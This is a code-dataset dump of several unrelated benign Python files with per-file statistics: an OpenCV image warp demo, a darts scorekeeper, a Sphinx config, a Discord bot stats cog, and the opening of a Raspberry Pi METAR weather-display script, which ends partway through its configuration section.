syncer_obj.sync() | 35.339286 | 90 | 0.722082 | 269 | 1,979 | 5.133829 | 0.375465 | 0.052136 | 0.037654 | 0.045619 | 0.33092 | 0.196959 | 0.196959 | 0.196959 | 0.136133 | 0.06517 | 0 | 0.013221 | 0.159171 | 1,979 | 56 | 91 | 35.339286 | 0.816707 | 0.542193 | 0 | 0 | 0 | 0 | 0.182127 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7e5dbfd361bd791bbb77e888a4a723f950db5b6 | 814 | py | Python | 03-image-manipulation/027-getting_perspective_transform.py | megatran/selflearning_openCV_ComputerVision | 9977c72451e5db6d581621f9bba6475020df493b | [
"MIT"
] | 3 | 2016-12-22T01:41:12.000Z | 2018-04-03T14:26:16.000Z | 03-image-manipulation/027-getting_perspective_transform.py | megatran/selflearning_openCV_ComputerVision | 9977c72451e5db6d581621f9bba6475020df493b | [
"MIT"
] | null | null | null | 03-image-manipulation/027-getting_perspective_transform.py | megatran/selflearning_openCV_ComputerVision | 9977c72451e5db6d581621f9bba6475020df493b | [
"MIT"
] | null | null | null | import cv2
import numpy as np
import matplotlib.pyplot as plt
#load input image
source_input = "/Users/nhant/Google Drive/OnlineLearning/selflearning_CV_with_Python/practice_sources/images/scan.jpg"
image = cv2.imread(source_input, 0)
cv2.imshow("Original", image)
cv2.waitKey(0)
#Coordinates of the 4 corners of the original image
points_A = np.float32([[320, 15], [700,215], [85, 610], [530, 780]])
#Coordinates of the 4 corners of the desired output
#use ratio of an A4 paper 1 : 1.41
points_B = np.float32([[0,0], [420, 0], [0,594], [420, 594]])
#Use two sets of four points to compute
#perspective transformation matrix M
M = cv2.getPerspectiveTransform(points_A, points_B)
warped = cv2.warpPerspective(image, M, (420, 594))
cv2.imshow("Warp Perspective", warped)
cv2.waitKey(0)
cv2.destroyAllWindows() | 30.148148 | 118 | 0.749386 | 130 | 814 | 4.615385 | 0.561538 | 0.033333 | 0.036667 | 0.056667 | 0.096667 | 0.096667 | 0.096667 | 0 | 0 | 0 | 0 | 0.093969 | 0.124079 | 814 | 27 | 119 | 30.148148 | 0.747546 | 0.272727 | 0 | 0.142857 | 0 | 0 | 0.212947 | 0.13799 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ea76e3a00992a63464a4b9c3737bee379992e0 | 471 | py | Python | ai2_replication/tables.py | georgetown-cset/ai-definitions-for-policymaking | 667e928c8bb30f6e02696ac71081c6bae4096f50 | [
"ADSL"
] | 1 | 2020-06-24T20:45:03.000Z | 2020-06-24T20:45:03.000Z | ai2_replication/tables.py | georgetown-cset/ai-definitions-for-policymaking | 667e928c8bb30f6e02696ac71081c6bae4096f50 | [
"ADSL"
] | null | null | null | ai2_replication/tables.py | georgetown-cset/ai-definitions-for-policymaking | 667e928c8bb30f6e02696ac71081c6bae4096f50 | [
"ADSL"
] | null | null | null | from bq import create_client, read_sql, query
DATASET = 'ai2_replication'
client = create_client()
def make_table(table, **kw):
sql = read_sql(f'../ai2_replication/{table}.sql')
job = query(sql, table, dataset=DATASET, truncate=True, **kw)
return job.result()
make_table('institutions')
make_table('paper_authors_w_countries')
make_table('language')
make_table('ai_papers_any_author')
make_table('paper_author_institution')
make_table('oecd_comparison')
| 24.789474 | 65 | 0.757962 | 66 | 471 | 5.075758 | 0.515152 | 0.18806 | 0.083582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004751 | 0.106157 | 471 | 18 | 66 | 26.166667 | 0.790974 | 0 | 0 | 0 | 0 | 0 | 0.316348 | 0.167728 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ece99dd02eb89f09500f97afcdb043d91ff97d | 6,002 | py | Python | index.py | wpcarro/cricket_assist | a1183f586f48cf4f9b2d9ee01c4ed6537477f6c4 | [
"MIT"
] | null | null | null | index.py | wpcarro/cricket_assist | a1183f586f48cf4f9b2d9ee01c4ed6537477f6c4 | [
"MIT"
] | null | null | null | index.py | wpcarro/cricket_assist | a1183f586f48cf4f9b2d9ee01c4ed6537477f6c4 | [
"MIT"
] | null | null | null | import re, sys
from itertools import cycle
DEBUG = False
def init_board(player_name):
# 50 will be a bullseye
b = dict((k, 0) for k in range(20, 14, -1))
b.update({50: 0})
b['player_name'] = player_name
return b
def create_game(player_name_1, player_name_2, is_three_player=False):
score_1 = init_board(player_name_1)
score_2 = init_board(player_name_2)
return (score_1, score_2)
def create_n_games(player_names):
return [init_board(pn) for pn in player_names]
def record_scores(board, *scores):
for s in scores:
try:
board[s] += 1
except KeyError as ke:
if DEBUG:
print('%d is not a score in cricket...' % s)
def is_winning_board(board):
return all(v >= 3 for k, v in board.items() if k != 'player_name')
def clamp(mn, mx, x):
return max(min(x, mx), mn)
def score_to_symbol(score):
symbol_dict = {
0: '.',
1: '/',
2: 'X',
3: '©'
}
return symbol_dict[clamp(0, 3, score)]
def num_to_symbol(num):
return num if num != 50 else 'BE'
def print_board(board):
print(board['player_name'])
for (k, v) in board.items():
if k == 'player_name':
continue
v = clamp(0, 3, v)
print('{num} {s} '.format(
num=num_to_symbol(k),
s=score_to_symbol(v)
))
print('----------\n')
def print_game(board_1, board_2):
if DEBUG:
print('-- DEBUG --')
print('board_1')
print(board_1)
print('board_2')
print(board_2)
print()
print('-- Current Game --')
for (k1, v1), (k2, v2) in zip(board_1.items(), board_2.items()):
if k1 == 'player_name':
continue
v1, v2 = clamp(0, 3, v1), clamp(0, 3, v2)
print(' {s1} {num} {s2} '.format(
s1=score_to_symbol(v1),
num=num_to_symbol(k1),
s2=score_to_symbol(v2))
)
print('------------------')
print(' %3d %3d ' % (compute_sum(board_1), compute_sum(board_2)))
def compute_sum(board):
blacklist_keys = [
'player_name',
'BE'
]
return sum(int(k) * v for k, v in board.items() if k not in blacklist_keys)
def expand_shorthand(multiplier, score):
return ' '.join([score for x in range(int(multiplier))])
def convert_score(score):
alt_score_formats = {
'b': '50',
'be': '50'
}
try:
score = alt_score_formats[score]
except KeyError as ke:
score = score
return score
def process_input(score_string):
results = []
regex = re.compile(r'(\d+)x(\d{1,2}|be)')
for s in re.split(r'\s+', score_string.lower()):
try:
multiplier, score = regex.match(s).groups()
score = convert_score(score)
score = expand_shorthand(multiplier, score)
except AttributeError as ae:
score = convert_score(s)
results.append(score)
return [int(x) for x in ' '.join(results).split(' ')]
def prompt_debug():
result = input('DEBUG (y/N)? ').lower()
DEBUG = re.compile(r'y(?:es)?').match(result) != None
def prompt_num_players():
result = input('Number of players: ')
return int(result)
def prompt_and_record_scores(current_board):
keep_asking = True
while keep_asking:
try:
scores_string = input('Report %s\'s scores ... ' % current_board['player_name'])
scores = process_input(scores_string)
test_board = current_board.copy()
test_scores = scores.copy()
# Attempt to record the scores on a test board
record_scores(test_board, *scores)
keep_asking = False
except ValueError:
print('Invalid input: %s' % scores_string)
pass
record_scores(current_board, *scores)
def run_n_players(player_count):
player_names = []
if not DEBUG:
player_names = [input('Enter a name for player: ') for player in range(player_count)]
else:
player_names = ['player %d' % x for x in range(player_count)]
if DEBUG:
print('player_names: %s' % player_names)
boards = create_n_games(player_names)
player_index_cycle = cycle(range(player_count))
winning_board = None
should_continue = True
while should_continue:
current_player_index = next(player_index_cycle)
current_board = boards[current_player_index]
prompt_and_record_scores(current_board)
is_last_player = current_player_index + 1 == player_count
if is_last_player:
print_boards(boards)
if not winning_board:
winning_board = current_board if is_winning_board(current_board) else None
should_continue = not (winning_board and is_last_player)
print('%s wins!' % winning_board['player_name'])
print('-- Winning Board --')
print_board(winning_board)
return 0
def print_boards(boards):
player_initials = [board.get('player_name')[0].upper() for board in boards]
initials_string = ' '
board_format_string = '{num}'
for i in range(len(boards)):
initials_string += ' ' + player_initials[i]
board_format_string += ' {' + str(i) + '}'
combined_boards = {}
for k in boards[0].keys():
if k == 'player_name':
continue
combined_boards[k] = [score_to_symbol(clamp(0, 3, board[k])) for board in boards]
print(initials_string)
for (num, scores) in combined_boards.items():
print(board_format_string.format(*scores, num=num_to_symbol(num)))
# TODO: make the number of '-' dynamically generated.
print('------------------\n')
def run():
prompt_debug()
n = prompt_num_players()
return run_n_players(n)
if __name__ == '__main__':
try:
sys.exit(run())
except KeyboardInterrupt as ki:
print('\nThanks for playing!')
sys.exit(1)
| 23.81746 | 93 | 0.588804 | 802 | 6,002 | 4.173317 | 0.19202 | 0.047804 | 0.02689 | 0.01703 | 0.07559 | 0.043621 | 0.023902 | 0.023902 | 0.017927 | 0.017927 | 0 | 0.017584 | 0.279907 | 6,002 | 251 | 94 | 23.912351 | 0.756594 | 0.01966 | 0 | 0.089286 | 0 | 0.005952 | 0.089981 | 0 | 0 | 0 | 0 | 0.003984 | 0 | 1 | 0.119048 | false | 0.005952 | 0.011905 | 0.029762 | 0.214286 | 0.160714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ecf4dea285e29e329083dd299a7dfc50138e80 | 815 | py | Python | days/day008/bite_105_Slice_and_dice/test_bite_105.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 2 | 2018-10-28T17:12:37.000Z | 2018-10-28T17:12:39.000Z | days/day008/bite_105_Slice_and_dice/test_bite_105.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 3 | 2018-10-28T17:11:04.000Z | 2018-10-29T22:36:36.000Z | days/day008/bite_105_Slice_and_dice/test_bite_105.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | null | null | null | from bite_105 import slice_and_dice
another_text = """
Take the block of text provided and strip() off the whitespace at the ends.
Split the whole block up by newline (\n).
if the first character is lowercase, split it into words and add the last word
of that line to the results list.
Strip the trailing dot (.) and exclamation mark (!) from the word first.
finally return the results list!
"""
def test_slice_and_dice_default_text():
expected = ['objects', 'y', 'too', ':)', 'bites']
assert slice_and_dice() == expected
def test_slice_and_dice_other_text():
# each line needs to be stripped, so the line starting with ' if'
# is a match here, hence expected matches 'word' too
expected = ['word', 'list', 'list']
assert slice_and_dice(another_text) == expected
| 35.434783 | 80 | 0.69816 | 125 | 815 | 4.4 | 0.552 | 0.072727 | 0.109091 | 0.069091 | 0.152727 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004651 | 0.208589 | 815 | 22 | 81 | 37.045455 | 0.848062 | 0.139877 | 0 | 0 | 0 | 0 | 0.545858 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ede2ad7a4434d9692ca62c8d2ad0603952f192 | 1,902 | py | Python | eutils/xmlfacades/base.py | pmartin23/eutils | 9cd8f30a628b6d7a12b8b2a7b99c2a3e7531dd89 | [
"Apache-2.0"
] | null | null | null | eutils/xmlfacades/base.py | pmartin23/eutils | 9cd8f30a628b6d7a12b8b2a7b99c2a3e7531dd89 | [
"Apache-2.0"
] | null | null | null | eutils/xmlfacades/base.py | pmartin23/eutils | 9cd8f30a628b6d7a12b8b2a7b99c2a3e7531dd89 | [
"Apache-2.0"
] | 1 | 2018-10-08T16:34:55.000Z | 2018-10-08T16:34:55.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import lxml.etree
from eutils.exceptions import EutilsError
logger = logging.getLogger(__name__)
class Base(object):
"""Root class for all xmlfacade classes.
This class is instantiated only by subclasses.
xmlfacades must be instantiated with an XML document, passed
either as XML text or as the root of a parsed XML document.
_root_tag must be defined by the subclass. It is used to validate
the node type upon instantiation of the subclass.
"""
_root_tag = None
def __init__(self, xml):
if isinstance(xml, lxml.etree._Element):
self._xml_root = xml
elif isinstance(xml, str) or isinstance(xml, bytes):
self._xml_root = lxml.etree.XML(xml)
else:
raise EutilsError("Cannot create object from type " + type(xml).__name__)
if self._root_tag is None:
raise EutilsError("_root_tag not defined for class {}".format(type(self).__name__))
elif self._root_tag != self._xml_root.tag:
raise EutilsError("XML for {} object must be a {} element (got {})".format(
type(self).__name__, self._root_tag, self._xml_root.tag))
# <LICENSE>
# Copyright 2015 eutils Committers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
# </LICENSE>
| 32.793103 | 95 | 0.702419 | 268 | 1,902 | 4.80597 | 0.473881 | 0.043478 | 0.034161 | 0.02795 | 0.03882 | 0.03882 | 0.03882 | 0 | 0 | 0 | 0 | 0.006036 | 0.216088 | 1,902 | 57 | 96 | 33.368421 | 0.857814 | 0.484753 | 0 | 0 | 0 | 0 | 0.120043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.210526 | 0 | 0.368421 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ee062bcf2f22e9d0d6db53332fc8d8fd058131 | 4,442 | py | Python | doc/conf.py | isuruf/pycl-fft | 7380fd573dcd6ff43fa8c1cdd99a861558fc8166 | [
"MIT"
] | 1 | 2022-03-24T16:20:27.000Z | 2022-03-24T16:20:27.000Z | doc/conf.py | isuruf/pycl-fft | 7380fd573dcd6ff43fa8c1cdd99a861558fc8166 | [
"MIT"
] | 1 | 2022-03-24T20:40:18.000Z | 2022-03-24T20:40:18.000Z | doc/conf.py | isuruf/pycl-fft | 7380fd573dcd6ff43fa8c1cdd99a861558fc8166 | [
"MIT"
] | 1 | 2022-03-24T20:07:03.000Z | 2022-03-24T20:07:03.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath("."))
# -- Project information -----------------------------------------------------
project = "pycl_fft"
copyright = "2021, Zachary J Weiner"
author = "Zachary J Weiner"
import pkg_resources
version = pkg_resources.get_distribution("pycl_fft").version
release = version
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named "sphinx.ext.*") or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.linkcode",
"sphinx.ext.ifconfig",
"sphinx.ext.doctest",
"sphinx_copybutton"
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "furo"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"numpy": ("https://docs.scipy.org/doc/numpy/", None),
"scipy": ("https://docs.scipy.org/doc/scipy/reference/", None),
"pyopencl": ("https://documen.tician.de/pyopencl", None),
"pytest": ("https://docs.pytest.org/en/latest/", None),
}
latex_elements = {
"maxlistdepth": "99",
}
# autodoc_mock_imports = ["sympy"]
import os
on_rtd = os.environ.get("READTHEDOCS") == "True"
# setup copy button thing
def setup(app):
app.add_config_value("on_rtd", on_rtd, "env")
doctest_global_setup = """
import pyopencl as cl
import pyopencl.array as cla
"""
copybutton_prompt_text = r">>> |\.\.\. |\$ |In \[\d*\]: | {2,5}\.\.\.: | {5,8}: "
copybutton_prompt_is_regexp = True
import sys
import inspect
linkcode_revision = "main"
linkcode_url = "https://github.com/zachjweiner/pycl-fft/blob/" \
+ linkcode_revision + "/{filepath}#L{linestart}-L{linestop}"
def linkcode_resolve(domain, info):
if domain != "py" or not info["module"]:
return None
modname = info["module"]
topmodulename = modname.split(".")[0]
fullname = info["fullname"]
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split("."):
try:
obj = getattr(obj, part)
except Exception:
return None
try:
modpath = pkg_resources.require(topmodulename)[0].location
filepath = os.path.relpath(inspect.getsourcefile(obj), modpath)
if filepath is None:
return
except Exception:
return None
try:
source, lineno = inspect.getsourcelines(obj)
except OSError:
return None
else:
linestart, linestop = lineno, lineno + len(source) - 1
return linkcode_url.format(
filepath=filepath, linestart=linestart, linestop=linestop)
import pycl_fft
pycl_fft.clfft.Transform = pycl_fft.clfft.Transform.__wrapped__
pycl_fft.vkfft.Transform = pycl_fft.vkfft.Transform.__wrapped__
rst_prolog = """
.. |vkfft| replace:: :mod:`VkFFT`
.. _vkfft: https://github.com/DTolm/VkFFT
.. |clfft| replace:: :mod:`clFFT`
.. _clfft: https://github.com/clMathLibraries/clFFT
.. |scipy| replace:: :mod:`scipy`
.. _scipy: https://docs.scipy.org/doc/scipy/reference/
"""
| 29.223684 | 81 | 0.653534 | 556 | 4,442 | 5.116906 | 0.420863 | 0.019684 | 0.014763 | 0.017926 | 0.088576 | 0.027417 | 0.027417 | 0.027417 | 0 | 0 | 0 | 0.004089 | 0.174246 | 4,442 | 151 | 82 | 29.417219 | 0.771538 | 0.356596 | 0 | 0.142857 | 0 | 0 | 0.323779 | 0.020524 | 0 | 0 | 0 | 0.006623 | 0 | 1 | 0.02381 | false | 0 | 0.083333 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ef0b6330bf83a65c9139ff19ea3b7d9451cdd7 | 1,062 | py | Python | cogs/dbl.py | AdibHoque/dat_orange_bot | e3c4d26587903eeea986225d330d8c46b981b1e7 | [
"Apache-2.0"
] | 1 | 2020-08-06T09:43:50.000Z | 2020-08-06T09:43:50.000Z | cogs/dbl.py | AdibHoque/dat_orange_bot | e3c4d26587903eeea986225d330d8c46b981b1e7 | [
"Apache-2.0"
] | null | null | null | cogs/dbl.py | AdibHoque/dat_orange_bot | e3c4d26587903eeea986225d330d8c46b981b1e7 | [
"Apache-2.0"
] | 1 | 2020-06-13T15:42:24.000Z | 2020-06-13T15:42:24.000Z | import discord
import json
import aiohttp
import asyncio
import os
from discord.ext import commands
uri = 'https://discordbots.org/api'
class dbl:
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession()
def __unload(self):
self.bot.loop.create_task(self.session.close())
async def send(self):
dump = json.dumps({
'server_count': len(self.bot.guilds)
})
head = {
'authorization': os.environ.get('DBLAPI'),
'content-type' : 'application/json'
}
url = '{0}/bots/439919013766758420/stats'.format(uri)
async with self.session.post(url, data=dump, headers=head) as resp:
print('returned {0.status} for {1} on dbl'.format(resp, dump))
async def on_guild_join(self, server):
await self.send()
async def on_guild_remove(self, server):
await self.send()
async def on_ready(self):
await self.send()
def setup(bot):
bot.add_cog(dbl(bot))
| 23.086957 | 75 | 0.596045 | 133 | 1,062 | 4.654135 | 0.518797 | 0.045234 | 0.048465 | 0.048465 | 0.106624 | 0.106624 | 0.106624 | 0.106624 | 0 | 0 | 0 | 0.027523 | 0.281544 | 1,062 | 45 | 76 | 23.6 | 0.783748 | 0 | 0 | 0.09375 | 0 | 0 | 0.144068 | 0.031073 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.1875 | 0 | 0.3125 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ef3163c0a10b7deccdaa772bc3b92dde71d51f | 91,866 | py | Python | metar-display-v4.py | IceMan21/livesectional | bfd76adea22d38eea71b772d3f9b6e3851d6ee24 | [
"MIT-feh"
] | 5 | 2020-10-20T18:26:39.000Z | 2021-06-08T17:39:30.000Z | metar-display-v4.py | IceMan21/livesectional | bfd76adea22d38eea71b772d3f9b6e3851d6ee24 | [
"MIT-feh"
] | 10 | 2020-09-29T05:05:03.000Z | 2021-09-24T20:55:32.000Z | metar-display-v4.py | IceMan21/livesectional | bfd76adea22d38eea71b772d3f9b6e3851d6ee24 | [
"MIT-feh"
] | 4 | 2020-09-29T02:23:38.000Z | 2022-03-23T04:21:53.000Z | #!/usr/bin/python3
#metar-display-v4.py - by Mark Harris.
# Updated to work with Python 3.7
# Adds TAF display when rotary switch is positioned accordingly. Default data user selectable if no rotary switch is used.
# Adds MOS data display when rotary switch is positioned accordingly.
# Adds timer routine to turn off map at night (or whenever) then back on again automatically. Pushbutton to turn on temporarily
# Fixed bug where 'LGND' wasn't filtered from URL.
# Changed welcome message to stop scrolling.
# Add auto restart if config.py is saved so new settings will automatically be read by scripts
# Add IP display with welcome message if desired.
# Added internet availability check and retry if necessary. This should help when power is disrupted and board reboots before router does.
# Added Logging capabilities which is stored in /NeoSectional/logfile.log
# Added ability to display wind direction as an arrow or numbers.
# Fixed bug when a blank screen is desired and abovekts is used as well. Thanks Lance.
# Added Top 10 list for Heat Map
# Added Gusting Winds, CALM and VRB based on Lance Blank's work. Thank you Lance.
# Added ability to detect a Rotary Switch is NOT installed and react accordingly.
# Added ability to specifiy an exclusive subset of airports to display.
# Added ability to display text rotated 180 degrees, and/or reverse order of display of multiple OLED's if wired backwards
# Added fix to Sleep Timer. Thank You to Matthew G for your code to make this work.
#Displays airport ID, wind speed in kts and wind direction on an LCD or OLED display.
#Wind direction uses an arrow to display general wind direction from the 8 cardinal points on a compass.
#The settings below can be changed to display the top X number of airports or just those whose winds are above a specified speed.
#The OLED display can be inverted, and even the highest wind can be displayed in bold font.
#A welcome message can be displayed each time the FAA weather is updated. (Multi-Oleds only)
#Also, the local and zulu time can be displayed after each group of high winds have been displayed. (Multi-Oleds only)
#To be used along with metar-v4.py if an LCD or OLED display is used.
#startup.py is run at boot-up by /etc/rc.local to create 2 threads. One running this script and the other thread running metar-v4.py
#startup.py taken from; https://raspberrypi.stackexchange.com/questions/39108/how-do-i-start-two-different-python-scripts-with-rc-local
#Currently written for 16x2 LCD panel wired in 4 bit arrangement or a Single OLED Display SSD1306.SSD1306_128_64 or 128x32 with changes to text output.
#With a TCA9548A I2C Multiplexer, up to 8 OLED displays can be used and some of the features need multiple OLED's. https://www.adafruit.com/product/2717
#For info on using the TCA9548A see;
#https://buildmedia.readthedocs.org/media/pdf/adafruit-circuitpython-tca9548a/latest/adafruit-circuitpython-tca9548a.pdf
#An IC238 Light Sensor can be used to control the brightness of the OLED displays, or a potentiometer for an LCD Display.
#For more info on the sensor visit; http://www.uugear.com/portfolio/using-light-sensor-module-with-raspberry-pi/
#Important note: to insure the displayed time is correct, follow these instructions
# sudo raspi-config
# Select Internationalisation Options
# Select I2 Change Timezone
# Select your Geographical Area
# Select your nearest City
# Select Finish
# Select Yes to reboot now
#RPI GPIO Pinouts reference
###########################
# 3V3 (1) (2) 5V #
# GPIO2 (3) (4) 5V #
# GPIO3 (5) (6) GND #
# GPIO4 (7) (8) GPIO14 #
# GND (9) (10) GPIO15 #
# GPIO17 (11) (12) GPIO18 #
# GPIO27 (13) (14) GND #
# GPIO22 (15) (16) GPIO23 #
# 3V3 (17) (18) GPIO24 #
# GPIO10 (19) (20) GND #
# GPIO9 (21) (22) GPIO25 #
# GPIO11 (23) (24) GPIO8 #
# GND (25) (26) GPIO7 #
# GPIO0 (27) (28) GPIO1 #
# GPIO5 (29) (30) GND #
# GPIO6 (31) (32) GPIO12 #
# GPIO13 (33) (34) GND #
# GPIO19 (35) (36) GPIO16 #
# GPIO26 (37) (38) GPIO20 #
# GND (39) (40) GPIO21 #
###########################
#Import needed libraries
#Misc libraries
import urllib.request, urllib.error, urllib.parse
import xml.etree.ElementTree as ET
import time
import sys
import os
from os.path import getmtime
from datetime import datetime
from datetime import timedelta
from datetime import time as time_ #part of timer fix
import operator
import RPi.GPIO as GPIO
import socket
import collections
import re
import random
import logging
import logzero
from logzero import logger
import config #User settings stored in file config.py, used by other scripts
import admin
#LCD Libraries - Only needed if an LCD Display is to be used. Comment out if you would like.
#Visit; http://www.circuitbasics.com/raspberry-pi-lcd-set-up-and-programming-in-python/ and follow info for 4-bit mode.
#To install RPLCD library;
# sudo pip3 install RPLCD
import RPLCD as RPLCD
from RPLCD.gpio import CharLCD
#OLED libraries - Only needed if OLED Display(s) are to be used. Comment out if you would like.
import smbus2 #Install smbus2; sudo pip3 install smbus2
# git clone https://github.com/adafruit/Adafruit_Python_GPIO.git
# cd Adafruit_Python_GPIO
# sudo python3 setup.py install
from Adafruit_GPIO import I2C
import Adafruit_SSD1306 #sudo pip3 install Adafruit-SSD1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
# Setup rotating logfile with 3 rotations, each with a maximum filesize of 1MB:
version = admin.version #Software version
loglevel = config.loglevel
loglevels = [logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR]
logzero.loglevel(loglevels[loglevel]) #Choices in order; DEBUG, INFO, WARNING, ERROR
logzero.logfile("/NeoSectional/logfile.log", maxBytes=1e6, backupCount=3)
logger.info("\n\nStartup of metar-display-v4.py Script, Version " + version)
logger.info("Log Level Set To: " + str(loglevels[loglevel]))
#****************************************************************************
#* User defined Setting Here - Make changes in config.py instead of here. *
#****************************************************************************
#rotate and oled wiring order
rotyesno = config.rotyesno #Rotate 180 degrees, 0 = No, 1 = Yes
oledposorder = config.oledposorder #Oled Wiring Position, 0 = Normally pos 0-7, 1 = Backwards pos 7-0
#create list of airports to exclusively display on the OLEDs
exclusive_list = config.exclusive_list #Must be in this format: ['KFLG', 'KSEZ', 'KPHX', 'KCMR', 'KINW', 'KPAN', 'KDVT', 'KGEU']
exclusive_flag = config.exclusive_flag #0 = Do not use exclusive list, 1 = only use exclusive list
#Specific Variables to default data to display if Rotary Switch is not installed.
wind_numorarrow = config.wind_numorarrow #0 = Display Wind direction using arrows, 1 = Display wind direction using numbers.
#Typically if rotary switch is not used, METAR's will be displayed exclusively. But if metar_taf = 0, then TAF's can be the default.
hour_to_display = config.time_sw0 #hour_to_display #Offset in HOURS to choose which TAF to display
metar_taf_mos = config.data_sw0 #config.metar_taf_mos #0 = Display TAF, 1 = Display METAR, 2 = Display MOS, 3 = Heat Map
toggle_sw = -1 #Set toggle_sw to an initial value that forces rotary switch to dictate data displayed.
data_sw0 = config.data_sw0 #User selectable source of data on Rotary Switch position 0. 0 = TAF, 1 = METAR, 2 = MOS
data_sw1 = config.data_sw1 #User selectable source of data on Rotary Switch position 1. 0 = TAF, 1 = METAR, 2 = MOS
data_sw2 = config.data_sw2 #User selectable source of data on Rotary Switch position 2. 0 = TAF, 1 = METAR, 2 = MOS
data_sw3 = config.data_sw3 #User selectable source of data on Rotary Switch position 3. 0 = TAF, 1 = METAR, 2 = MOS
data_sw4 = config.data_sw4 #User selectable source of data on Rotary Switch position 4. 0 = TAF, 1 = METAR, 2 = MOS
data_sw5 = config.data_sw5 #User selectable source of data on Rotary Switch position 5. 0 = TAF, 1 = METAR, 2 = MOS
